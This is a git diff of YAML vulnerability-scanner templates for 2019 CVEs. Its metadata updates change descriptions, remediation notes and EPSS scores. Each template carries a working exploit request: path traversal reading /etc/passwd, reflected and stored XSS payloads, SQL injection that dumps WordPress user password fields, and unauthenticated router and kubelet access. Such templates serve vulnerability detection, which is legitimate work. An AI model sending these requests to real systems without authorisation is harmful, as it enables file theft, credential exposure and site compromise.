"{{BaseURL}}/../../etc/passwd" + matchers-condition: and matchers: + - type: regex regex: - "root:[x*]:0:0" + - type: status status: - 200 diff --git a/poc/cve/CVE-2019-1010287.yaml b/poc/cve/CVE-2019-1010287.yaml index b1afc71348..21a1db6c7b 100644 --- a/poc/cve/CVE-2019-1010287.yaml +++ b/poc/cve/CVE-2019-1010287.yaml @@ -1,23 +1,33 @@ id: CVE-2019-1010287 + info: - name: Timesheet 1.5.3 - Cross Site Scripting + name: Timesheet Next Gen <=1.5.3 - Cross-Site Scripting author: pikpikcu severity: medium - description: 'Timesheet Next Gen 1.5.3 and earlier is affected by: Cross Site Scripting (XSS). The impact is: Allows an attacker to execute arbitrary HTML and JavaScript code via a "redirect" parameter. The component is: Web login form: login.php, lines 40 and 54. The attack vector is: reflected XSS, victim may click the malicious url.' + description: 'Timesheet Next Gen 1.5.3 and earlier is vulnerable to cross-site scripting that allows an attacker to execute arbitrary HTML and JavaScript code via a "redirect" parameter. The component is: Web login form: login.php, lines 40 and 54. The attack vector is: reflected XSS, victim may click the malicious url.' + remediation: | + Upgrade to a patched version of Timesheet Next Gen (1.5.4 or above) that properly sanitizes user input to prevent XSS attacks. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2019-1010287 - http://www.mdh-tz.info/ - https://sourceforge.net/p/tsheetx/discussion/779083/thread/7fcb52f696/ - https://sourceforge.net/p/tsheetx/code/497/tree/branches/legacy/login.php#l40 + - https://nvd.nist.gov/vuln/detail/CVE-2019-1010287 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2019-1010287 cwe-id: CWE-79 + epss-score: 0.00129 + epss-percentile: 0.47471 + cpe: cpe:2.3:a:timesheet_next_gen_project:timesheet_next_gen:*:*:*:*:*:*:*:* metadata: - google-dork: inurl:"/timesheet/login.php" + max-request: 1 + vendor: timesheet_next_gen_project + product: timesheet_next_gen + google-query: inurl:"/timesheet/login.php" tags: cve,cve2019,timesheet,xss -requests: + +http: - raw: - | POST /timesheet/login.php HTTP/1.1 @@ -25,12 +35,15 @@ requests: Content-Type: application/x-www-form-urlencoded username=%27%22%3E%3Cscript%3Ejavascript%3Aalert%28document.domain%29%3C%2Fscript%3E&password=pd&submit=Login + matchers-condition: and matchers: - - type: status - status: - - 200 - type: word + part: body words: - '>' - part: body + + - type: status + status: + - 200 +# digest: 4a0a00473045022100a05d1b81b235ac788d5cd2ed9b52e87b7ccf222d1d9287a834d56ad8052eac7402207d62b63a9b598b84557029354b23ab5402e5e020f04aae3f3573ff175c5eb812:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2019-10692.yaml b/poc/cve/CVE-2019-10692.yaml index 66751d09e7..7064f774fd 100644 --- a/poc/cve/CVE-2019-10692.yaml +++ b/poc/cve/CVE-2019-10692.yaml @@ -1,22 +1,39 @@ id: CVE-2019-10692 + info: - name: WP Google Maps < 7.11.18 - Unauthenticated SQL Injection + name: WordPress Google Maps <7.11.18 - SQL Injection author: pussycat0x severity: critical description: | - In the wp-google-maps plugin before 7.11.18 for WordPress, - includes/class.rest-api.php in the REST API does not sanitize field names - before a SELECT statement. + WordPress Google Maps plugin before 7.11.18 contains a SQL injection vulnerability. The plugin includes /class.rest-api.php in the REST API and does not sanitize field names before a SELECT statement. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + remediation: | + Update to the latest version of the WordPress Google Maps plugin (7.11.18 or higher). reference: - https://wpscan.com/vulnerability/475404ce-2a1a-4d15-bf02-df0ea2afdaea + - https://wordpress.org/plugins/wp-google-maps/#developers + - https://plugins.trac.wordpress.org/changeset?old_path=%2Fwp-google-maps&old=2061433&new_path=%2Fwp-google-maps&new=2061434&sfp_email=&sfph_mail=#file755 - https://nvd.nist.gov/vuln/detail/CVE-2019-10692 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2019-10692 + cwe-id: CWE-89 + epss-score: 0.9737 + epss-percentile: 0.99884 + cpe: cpe:2.3:a:codecabin:wp_go_maps:*:*:*:*:*:wordpress:*:* metadata: verified: true - tags: cve,cve2019,sqli,wp,wordpress,wp-plugin,unauth,googlemaps -requests: + max-request: 1 + vendor: codecabin + product: wp_go_maps + framework: wordpress + tags: cve,cve2019,wp,wp-plugin,unauth,sqli,wordpress,googlemaps,wpscan + +http: - method: GET path: - "{{BaseURL}}/?rest_route=/wpgmza/v1/markers&filter=%7b%7d&fields=%2a%20from%20wp_users--%20-" + matchers-condition: and matchers: - type: word @@ -26,10 +43,14 @@ requests: - '"user_pass"' - '"user_nicename"' condition: and + - type: word part: header words: - application/json + - type: status status: - 200 + +# digest: 4a0a0047304502205c241d4f1facd76bdfde37c8340bcaa0a5c3ba34416411d6f6da7b8c4ff982c6022100b91a025afcafc53b47ce443d8a9d069bc98738ff8ed3f0a695085d457c8f86ff:922c64590222798bb761d5b6d8e72950 diff --git a/poc/cve/CVE-2019-11013.yaml b/poc/cve/CVE-2019-11013.yaml index ea7a0c390c..259b5328b9 100644 --- a/poc/cve/CVE-2019-11013.yaml +++ b/poc/cve/CVE-2019-11013.yaml @@ -1,19 +1,43 @@ id: CVE-2019-11013 + info: - name: Nimble Streamer 3.0.2-2 to 3.5.4-9 - Path Traversal + name: Nimble Streamer <=3.5.4-9 - Local File Inclusion author: 0x_Akoko - severity: high - reference: https://www.exploit-db.com/exploits/47301 - tags: cves,lfi,nimble -requests: + severity: medium + description: Nimble Streamer 3.0.2-2 through 3.5.4-9 is vulnerable to local file inclusion. An attacker can traverse the file system to access files or directories that are outside of the restricted directory on the remote server. + remediation: | + Upgrade Nimble Streamer to a version higher than 3.5.4-9 to mitigate the LFI vulnerability. + reference: + - https://www.exploit-db.com/exploits/47301 + - https://mayaseven.com/nimble-directory-traversal-in-nimble-streamer-version-3-0-2-2-to-3-5-4-9/ + - http://packetstormsecurity.com/files/154196/Nimble-Streamer-3.x-Directory-Traversal.html + - https://nvd.nist.gov/vuln/detail/CVE-2019-11013 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.5 + cve-id: CVE-2019-11013 + cwe-id: CWE-22 + epss-score: 0.01775 + epss-percentile: 0.86632 + cpe: cpe:2.3:a:softvelum:nimble_streamer:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: softvelum + product: nimble_streamer + tags: cve2019,lfi,nimble,edb,packetstorm,cve + +http: - method: GET path: - "{{BaseURL}}/demo/file/../../../../../../../../etc/passwd%00filename.mp4/chunk.m3u8?nimblesessionid=1484448" + matchers-condition: and matchers: - type: regex regex: - "root:[x*]:0:0" + - type: status status: - 200 +# digest: 490a0046304402203b64f755b15b429a19a030c7313204330fd5f76672cc711a074c3936886c765e0220060020d79879019138a5971d08be9ba7ea4836ac9e9b8213052451f74aa3bb09:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2019-11248.yaml b/poc/cve/CVE-2019-11248.yaml index afd919791a..a5875ef6fe 100644 --- a/poc/cve/CVE-2019-11248.yaml +++ b/poc/cve/CVE-2019-11248.yaml @@ -6,8 +6,6 @@ info: severity: high description: | The debugging endpoint /debug/pprof is exposed over the unauthenticated Kubelet healthz port. This debugging endpoint can potentially leak sensitive information such as internal Kubelet memory addresses and configuration, or for limited denial of service. Versions prior to 1.15.0, 1.14.4, 1.13.8, and 1.12.10 are affected. The issue is of medium severity, but not exposed by the default configuration. - remediation: | - Disable or restrict access to the Debug Endpoint pprof to prevent unauthorized access. reference: - https://medium.com/bugbountywriteup/my-first-bug-bounty-21d3203ffdb0 - http://mmcloughlin.com/posts/your-pprof-is-showing @@ -18,17 +16,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L cvss-score: 8.2 cve-id: CVE-2019-11248 - cwe-id: CWE-862,CWE-419 - epss-score: 0.72895 - epss-percentile: 0.97787 - cpe: cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:* - metadata: - max-request: 2 - vendor: kubernetes - product: kubernetes + cwe-id: CWE-862 tags: cve,cve2019,debug,kubernetes,kubelet,devops,unauth,disclosure -http: +requests: - method: GET path: - "{{BaseURL}}/debug/pprof/" @@ -42,4 +33,5 @@ http: - "Profile Descriptions" - "goroutine profile: total" condition: or -# digest: 4b0a00483046022100f3138a71f318261cc5ffdbe2da21b4fc35fc3eb91efd772f27a9c85bf0bb2233022100b1fff6f6653eb3e44f258d2b5584461d1a28b15e9c67570e691b00ae433a18e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/06/15 diff --git a/poc/cve/CVE-2019-11370.yaml b/poc/cve/CVE-2019-11370.yaml index f49444e499..58ffa77862 100644 --- a/poc/cve/CVE-2019-11370.yaml +++ b/poc/cve/CVE-2019-11370.yaml @@ -1,13 +1,10 @@ id: CVE-2019-11370 - info: - name: Carel pCOWeb \">') condition: and -# digest: 4a0a00473045022028df516082ade8c8963d2e5fb38be7ff08c12d135e15533316d6e6c8364ed714022100c2cfd1382946f92cac3de4c8b5e0e946c223afb691244cdb89fc6a202b9e1a60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2019-12276.yaml b/poc/cve/CVE-2019-12276.yaml index c59ef768ea..05e57f1ea3 100644 --- a/poc/cve/CVE-2019-12276.yaml +++ b/poc/cve/CVE-2019-12276.yaml @@ -1,34 +1,48 @@ -id: CVE-2019-12276 - -info: - name: GrandNode 4.40 - Path Traversal - author: daffainfo - severity: high - description: Path Traversal vulnerability in Controllers/LetsEncryptController.cs in LetsEncryptController in GrandNode 4.40 allows remote, unauthenticated attackers to retrieve arbitrary files on the web server via specially crafted LetsEncrypt/Index?fileName= HTTP requests. A patch for this issue was made on 2019-05-30 in GrandNode 4.40. - reference: - - https://security401.com/grandnode-path-traversal/ - - https://www.cvedetails.com/cve/CVE-2019-12276 - tags: cve,cve2019,lfi - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 - cve-id: CVE-2019-12276 - cwe-id: CWE-22 - -requests: - - method: GET - path: - - "{{BaseURL}}/LetsEncrypt/Index?fileName=/etc/passwd" - headers: - Connection: close - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 +id: CVE-2019-12276 + +info: + name: GrandNode 4.40 - Local File Inclusion + author: daffainfo + severity: high + description: | + GrandNode 4.40 is susceptible to local file inclusion in Controllers/LetsEncryptController.cs, which allows remote unauthenticated attackers to retrieve arbitrary files on the web server via specially crafted LetsEncrypt/Index?fileName= HTTP requests. + remediation: | + A patch for this issue was made on 2019-05-30 in GrandNode 4.40. + reference: + - https://security401.com/grandnode-path-traversal/ + - https://grandnode.com + - https://github.com/grandnode/grandnode + - https://nvd.nist.gov/vuln/detail/CVE-2019-12276 + - http://packetstormsecurity.com/files/153373/GrandNode-4.40-Path-Traversal-File-Download.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2019-12276 + cwe-id: CWE-22 + epss-score: 0.96216 + epss-percentile: 0.9938 + cpe: cpe:2.3:a:grandnode:grandnode:4.40:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: grandnode + product: grandnode + tags: packetstorm,cve,cve2019,lfi,grandnode + +http: + - method: GET + path: + - "{{BaseURL}}/LetsEncrypt/Index?fileName=/etc/passwd" + + headers: + Connection: close + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 +# digest: 4b0a00483046022100b725a68a71114229dcc98a941f1a278b86086a42a5d70f3ffc7747c34b2ad720022100ae5c1ac57b87a963be41411a5b8ef07fc9d5bd73e05298da2b719e722e73d181:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2019-12962.yaml b/poc/cve/CVE-2019-12962.yaml index 0be257a894..68f3eb808d 100644 --- a/poc/cve/CVE-2019-12962.yaml +++ b/poc/cve/CVE-2019-12962.yaml @@ -1,40 +1,55 @@ id: CVE-2019-12962 + info: - name: LiveZilla Server 8.0.1.0 - Cross Site Scripting + name: LiveZilla Server 8.0.1.0 - Cross-Site Scripting author: Clment Cruchet severity: medium description: | - LiveZilla Server 8.0.1.0 - Accept-Language Reflected XSS + LiveZilla Server 8.0.1.0 is vulnerable to reflected cross-site scripting. + remediation: | + Upgrade to the latest version of LiveZilla Server or apply the vendor-provided patch to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/49669 - - https://nvd.nist.gov/vuln/detail/CVE-2019-12962 - https://forums.livezilla.net/index.php?/topic/10984-fg-vd-19-083085087-livezilla-server-are-vulnerable-to-cross-site-scripting-in-admin-panel/ - http://packetstormsecurity.com/files/161867/LiveZilla-Server-8.0.1.0-Cross-Site-Scripting.html + - https://nvd.nist.gov/vuln/detail/CVE-2019-12962 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2019-12962 cwe-id: CWE-79 + epss-score: 0.20689 + epss-percentile: 0.95876 + cpe: cpe:2.3:a:livezilla:livezilla:*:*:*:*:*:*:*:* metadata: - shodan-query: http.html:LiveZilla verified: true - tags: cve,cve2019,livezilla,xss -requests: + max-request: 1 + vendor: livezilla + product: livezilla + shodan-query: http.html:LiveZilla + tags: xss,edb,packetstorm,cve,cve2019,livezilla + +http: - method: GET path: - '{{BaseURL}}/mobile/index.php' + headers: Accept-Language: ';alert(document.domain)//' + matchers-condition: and matchers: - type: word part: body words: - "var detectedLanguage = ';alert(document.domain)//';" + - type: word part: header words: - "text/html" + - type: status status: - 200 +# digest: 490a00463044022006157a23e52badbb8d85007f09e12cf0fcfc8746196fba7e0715dea88eab5b0202207830f34604c6defbb9601defe0f51d23712c329e02c864813ecfadf0a87ce25b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2019-13101.yaml b/poc/cve/CVE-2019-13101.yaml index 3df83cb376..fc313615ee 100644 --- a/poc/cve/CVE-2019-13101.yaml +++ b/poc/cve/CVE-2019-13101.yaml @@ -1,33 +1,22 @@ id: CVE-2019-13101 info: - name: D-Link DIR-600M - Authentication Bypass author: Suman_Kar - severity: critical + name: D-Link DIR-600M Authentication Bypass description: D-Link DIR-600M 3.02, 3.03, 3.04, and 3.06 devices can be accessed directly without authentication and lead to disclosure of information about the WAN, which can then be leveraged by an attacker to modify the data fields of the page. - remediation: | - Update the router's firmware to the latest version provided by D-Link. + severity: critical reference: - https://github.com/d0x0/D-Link-DIR-600M - https://www.exploit-db.com/exploits/47250 - https://nvd.nist.gov/vuln/detail/CVE-2019-13101 - - https://us.dlink.com/en/security-advisory - - http://packetstormsecurity.com/files/153994/D-Link-DIR-600M-Wireless-N-150-Home-Router-Access-Bypass.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 + cvss-score: 9.80 cve-id: CVE-2019-13101 cwe-id: CWE-306 - epss-score: 0.03717 - epss-percentile: 0.90795 - cpe: cpe:2.3:o:dlink:dir-600m_firmware:3.02:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: dlink - product: dir-600m_firmware - tags: packetstorm,edb,cve,cve2019,dlink,router,iot + tags: cve,cve2019,dlink,router,iot -http: +requests: - raw: - | GET /wan.htm HTTP/1.1 @@ -36,13 +25,13 @@ http: matchers-condition: and matchers: - - type: word - part: body - words: - - "/PPPoE/" - - type: status status: - 200 -# digest: 4a0a00473045022100b34b6d784777c7bc7839f52f456cea0deeb6368c32b2fde7b990016172cf03fd02206ebf149631301f76efd08ba2dbe8308933c817fd6bba2ce7a2603c98f19be223:922c64590222798bb761d5b6d8e72950 + - type: word + words: + - "/PPPoE/" + part: body + +# Enhanced by mp on 2022/03/29 diff --git a/poc/cve/CVE-2019-14251.yaml b/poc/cve/CVE-2019-14251.yaml index 9b1fec3938..d13e3a74fd 100644 --- a/poc/cve/CVE-2019-14251.yaml +++ b/poc/cve/CVE-2019-14251.yaml @@ -1,24 +1,36 @@ id: CVE-2019-14251 + info: - name: T24 in TEMENOS Channels R15.01 - Pre Authenticated Path Traversal + name: T24 Web Server - Local File Inclusion author: 0x_Akoko severity: high - description: An unauthenticated path traversal vulnerability was discovered permitting an attacker to exfiltrate data directly from the T24 web server. + description: T24 web server is vulnerable to unauthenticated local file inclusion that permits an attacker to exfiltrate data directly from server. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in the T24 Web Server. reference: - https://github.com/kmkz/exploit/blob/master/CVE-2019-14251-TEMENOS-T24.txt - - https://www.cvedetails.com/cve/CVE-2019-14251 - https://vuldb.com/?id.146815 + - https://nvd.nist.gov/vuln/detail/CVE-2019-14251 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2019-14251 cwe-id: CWE-22 + epss-score: 0.01702 + epss-percentile: 0.86351 + cpe: cpe:2.3:a:temenos:t24:r15.01:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: temenos + product: t24 tags: cve,cve2019,temenos,lfi,unauth -requests: + +http: - method: GET path: - "{{BaseURL}}/WealthT24/GetImage?docDownloadPath=/etc/passwd" - "{{BaseURL}}/WealthT24/GetImage?docDownloadPath=c:/windows/win.ini" + matchers-condition: and matchers: - type: regex @@ -26,6 +38,8 @@ requests: - "root:.*:0:0:" - "for 16-bit app support" condition: or + - type: status status: - 200 +# digest: 4a0a0047304502206a9235411040b6de7a04c484b4af189424705f1f5c73554a799bf113e2f9b422022100dd0463d775ab00326937037d0202d49ca7b4099817b83612ceb875b918fa0204:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2019-15713.yaml b/poc/cve/CVE-2019-15713.yaml index 052732aa1e..d1342b61c3 100644 --- a/poc/cve/CVE-2019-15713.yaml +++ b/poc/cve/CVE-2019-15713.yaml @@ -1,21 +1,32 @@ id: CVE-2019-15713 info: - name: My Calendar <= 3.1.9 - Reflected Cross-Site Scripting (XSS) + name: WordPress My Calendar <= 3.1.9 - Cross-Site Scripting author: daffainfo,dhiyaneshDk severity: medium - description: The my-calendar plugin before 3.1.10 for WordPress has XSS. Triggered via unescaped usage of URL parameters in multiple locations presented in the public view of a site. + description: WordPress plugin My Calendar <= 3.1.9 is susceptible to reflected cross-site scripting which can be triggered via unescaped usage of URL parameters in multiple locations throughout the site. + remediation: | + Update to the latest version of the My Calendar plugin (>= 3.1.10) or apply the vendor-provided patch to fix the XSS vulnerability. reference: - https://wpscan.com/vulnerability/9267 + - https://wordpress.org/plugins/my-calendar/#developers - https://nvd.nist.gov/vuln/detail/CVE-2019-15713 - tags: cve,cve2019,wordpress,xss,wp-plugin classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2019-15713 cwe-id: CWE-79 + epss-score: 0.00101 + epss-percentile: 0.41329 + cpe: cpe:2.3:a:my_calendar_project:my_calendar:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + vendor: my_calendar_project + product: my_calendar + framework: wordpress + tags: cve,cve2019,wordpress,xss,wp-plugin,wpscan -requests: +http: - method: GET path: - '{{BaseURL}}/?rsd=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' @@ -23,9 +34,9 @@ requests: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header @@ -35,3 +46,4 @@ requests: - type: status status: - 200 +# digest: 4a0a004730450220264abd00bc4d8e8aed3c23447e74bf6b83be0254846fa18367a0e73207f4ff54022100da988bad4910c89d69797f15bc5dc2dff9abe0c272d68c8babe858f9594afc77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2019-16123.yaml b/poc/cve/CVE-2019-16123.yaml index c4a63a1fc6..5868d97896 100644 --- a/poc/cve/CVE-2019-16123.yaml +++ b/poc/cve/CVE-2019-16123.yaml @@ -1,39 +1,27 @@ id: CVE-2019-16123 - info: - name: PilusCart <=1.4.1 - Local File Inclusion + name: PilusCart <= 1.4.1 - Local File Disclosure author: 0x_Akoko severity: high - description: | - PilusCart versions 1.4.1 and prior suffer from a file disclosure vulnerability via local file inclusion. - remediation: | - Upgrade to a patched version of PilusCart (>=1.4.2) or apply the vendor-supplied patch to mitigate the LFI vulnerability. + description: PilusCart versions 1.4.1 and below suffers from a file disclosure vulnerability. reference: - https://packetstormsecurity.com/files/154250/PilusCart-1.4.1-Local-File-Disclosure.html - - https://www.exploit-db.com/exploits/47315 - - https://nvd.nist.gov/vuln/detail/CVE-2019-1653 - - https://zerodays.lol/ + - https://www.cvedetails.com/cve/CVE-2019-16123 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2019-16123 cwe-id: CWE-22 - epss-score: 0.72953 - epss-percentile: 0.97788 - cpe: cpe:2.3:a:kartatopia:piluscart:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: kartatopia - product: piluscart - tags: piluscart,lfi,packetstorm,edb,cve,cve2019 + tags: cve,cve2019,piluscart,lfi -http: +requests: - method: GET path: - "{{BaseURL}}/catalog.php?filename=../../../../../../../../../etc/passwd" matchers-condition: and matchers: + - type: regex regex: - "root:[x*]:0:0" @@ -41,4 +29,3 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e6e4ab7c914c07c53ea240efcb78c630b5bffb30f5b57f296a9dcd97fcd7143c0220363f481f26d2c5443282b3ceaf319c44f59d7cb3e9e62ecc1f842495ee455301:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2019-16931.yaml b/poc/cve/CVE-2019-16931.yaml index e26b55142a..7cccc93c52 100644 --- a/poc/cve/CVE-2019-16931.yaml +++ b/poc/cve/CVE-2019-16931.yaml @@ -1,36 +1,24 @@ id: CVE-2019-16931 - info: - name: WordPress Visualizer <3.3.1 - Cross-Site Scripting + name: Visualizer < 3.3.1 - Stored Cross-Site Scripting (XSS) author: ritikchaddha severity: medium description: | - WordPress Visualizer plugin before 3.3.1 contains a stored cross-site scripting vulnerability via /wp-json/visualizer/v1/update-chart WP-JSON API endpoint. An unauthenticated attacker can execute arbitrary JavaScript when an admin or other privileged user edits the chart via the admin dashboard. - remediation: | - Update to the latest version of WordPress Visualizer plugin (3.3.1) or apply the provided patch to fix the XSS vulnerability. + By abusing a lack of access controls on the /wp-json/visualizer/v1/update-chart WP-JSON API endpoint, an attacker can arbitrarily modify meta data of an existing chart, and inject a XSS payload to be stored and later executed when an admin goes to edit the chart. reference: - https://wpscan.com/vulnerability/867e000d-d2f5-4d53-89b0-41d7d4163f44 - https://nathandavison.com/blog/wordpress-visualizer-plugin-xss-and-ssrf - - https://wpvulndb.com/vulnerabilities/9893 - https://nvd.nist.gov/vuln/detail/CVE-2019-16931 - - https://wordpress.org/plugins/visualizer/#developers + - https://wpvulndb.com/vulnerabilities/9893 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2019-16931 cwe-id: CWE-79 - epss-score: 0.00244 - epss-percentile: 0.62296 - cpe: cpe:2.3:a:themeisle:visualizer:*:*:*:*:*:wordpress:*:* metadata: - verified: true - max-request: 1 - vendor: themeisle - product: visualizer - framework: wordpress - tags: cve,cve2019,wp-plugin,wordpress,wp,xss,unauth,wpscan - -http: + verified: "true" + tags: cve,cve2019,wp-plugin,wordpress,wp,xss,unauth +requests: - raw: - | POST /wp-json/visualizer/v1/update-chart HTTP/1.1 @@ -38,20 +26,16 @@ http: Content-Type: application/json {"id": 7, "visualizer-chart-type": ""} - matchers-condition: and matchers: - type: word part: body words: - '{"success":"Chart updated"}' - - type: word part: header words: - 'application/json' - - type: status status: - 200 -# digest: 490a0046304402201162300a4a1008ff6e7816c548ab6a7c9eda5874490d9f1e5a4cf2776e0a8c7e02200ca8e2bbf0048985c24e20727805a50410d1e5fa575a0e5256ea8f6c6335103e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2019-17418.yaml b/poc/cve/CVE-2019-17418.yaml index 035a45ca0c..86a6c43174 100644 --- a/poc/cve/CVE-2019-17418.yaml +++ b/poc/cve/CVE-2019-17418.yaml @@ -1,46 +1,30 @@ id: CVE-2019-17418 - info: - name: MetInfo 7.0.0 beta - SQL Injection + name: MetInfo 7.0 - SQL Injection author: ritikchaddha severity: high - description: | - MetInfo 7.0.0 beta is susceptible to SQL injection via the admin/?n=language&c=language_general&a=doSearchParameter appno parameter (a different issue than CVE-2019-16997). - remediation: | - Upgrade to a patched version of MetInfo or apply the necessary security patches provided by the vendor. + description: An issue was discovered in MetInfo 7.0. There is SQL injection via the admin/?n=language&c=language_general&a=doSearchParameter appno parameter, a different issue than CVE-2019-16997 reference: - - https://github.com/evi1code/Just-for-fun/issues/2 - https://nvd.nist.gov/vuln/detail/CVE-2019-17418 + - https://github.com/evi1code/Just-for-fun/issues/2 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2019-17418 cwe-id: CWE-89 - epss-score: 0.44305 - epss-percentile: 0.97021 - cpe: cpe:2.3:a:metinfo:metinfo:7.0.0:beta:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: metinfo - product: metinfo - tags: cve,cve2019,metinfo,sqli - -http: + tags: metinfo,sqli,cve,cve2019 +requests: - method: GET path: - "{{BaseURL}}/admin/?n=language&c=language_general&a=doSearchParameter&editor=cn&word=search&appno=0+union+select+98989*443131,1--+&site=admin" - - host-redirects: true + redirects: true max-redirects: 2 - matchers-condition: and matchers: - type: word part: body words: - "43865094559" - - type: status status: - 200 -# digest: 4a0a00473045022039467ce1d76b17a59ec2de90caa403777ea1d07dbf15aae3baf7c5135e49495b022100c44c8b3b95df256585fc53df18ebd9f63867553f8fe3f8fdbaefee6c70ee55ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2019-18665.yaml b/poc/cve/CVE-2019-18665.yaml index 36b4018e5a..ebca99678f 100644 --- a/poc/cve/CVE-2019-18665.yaml +++ b/poc/cve/CVE-2019-18665.yaml @@ -1,30 +1,45 @@ id: CVE-2019-18665 + info: - name: DOMOS 5.5 - Directory Traversal + name: DOMOS 5.5 - Local File Inclusion author: 0x_Akoko severity: high description: | - The Log module in SECUDOS DOMOS before 5.6 allows local file inclusion. + SECUDOS DOMOS before 5.6 allows local file inclusion via the log module. + remediation: | + Apply the latest patch or update to a version that is not affected by this vulnerability. reference: - https://atomic111.github.io/article/secudos-domos-directory_traversal - https://vuldb.com/?id.144804 - - https://www.cvedetails.com/cve/CVE-2019-18665 - https://www.secudos.de/news-und-events/aktuelle-news/domos-release-5-6 + - https://nvd.nist.gov/vuln/detail/CVE-2019-18665 + - https://www.cybersecurity-help.cz/vdb/SB2019110403 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2019-18665 cwe-id: CWE-22 + epss-score: 0.1062 + epss-percentile: 0.9447 + cpe: cpe:2.3:a:secudos:domos:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: secudos + product: domos tags: cve,cve2019,domos,lfi -requests: + +http: - method: GET path: - "{{BaseURL}}/page/sl_logdl?dcfct=DCMlog.download_log&dbkey%3Asyslog.rlog=/etc/passwd" + matchers-condition: and matchers: - type: regex regex: - "root:[x*]:0:0" + - type: status status: - 200 +# digest: 4a0a00473045022100e03bd2b0d604ee23a2a3c76f6bb80163f8f9704ebcc2d3d858167174a5a516ec022074d09be8ee48364febeecf0b8741706b71f7082264b50396e391ad5e54936b19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2019-18818.yaml b/poc/cve/CVE-2019-18818.yaml index 5ec5e8c48c..93039c65d6 100644 --- a/poc/cve/CVE-2019-18818.yaml +++ b/poc/cve/CVE-2019-18818.yaml @@ -1,47 +1,60 @@ id: CVE-2019-18818 info: - name: strapi CMS Unauthenticated Admin Password Reset + name: strapi CMS <3.0.0-beta.17.5 - Admin Password Reset author: idealphase severity: critical - description: "strapi CMS before 3.0.0-beta.17.5 mishandles password resets within packages/strapi-admin/controllers/Auth.js and packages/strapi-plugin-users-permissions/controllers/Auth.js." + description: strapi CMS before 3.0.0-beta.17.5 allows admin password resets because it mishandles password resets within packages/strapi-admin/controllers/Auth.js and packages/strapi-plugin-users-permissions/controllers/Auth.js. + remediation: | + Upgrade Strapi CMS to a version higher than 3.0.0-beta.17.5 to mitigate the vulnerability. reference: - https://github.com/advisories/GHSA-6xc2-mj39-q599 - https://www.exploit-db.com/exploits/50239 - https://nvd.nist.gov/vuln/detail/CVE-2019-18818 + - https://github.com/strapi/strapi/releases/tag/v3.0.0-beta.17.5 + - https://github.com/strapi/strapi/pull/4443 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 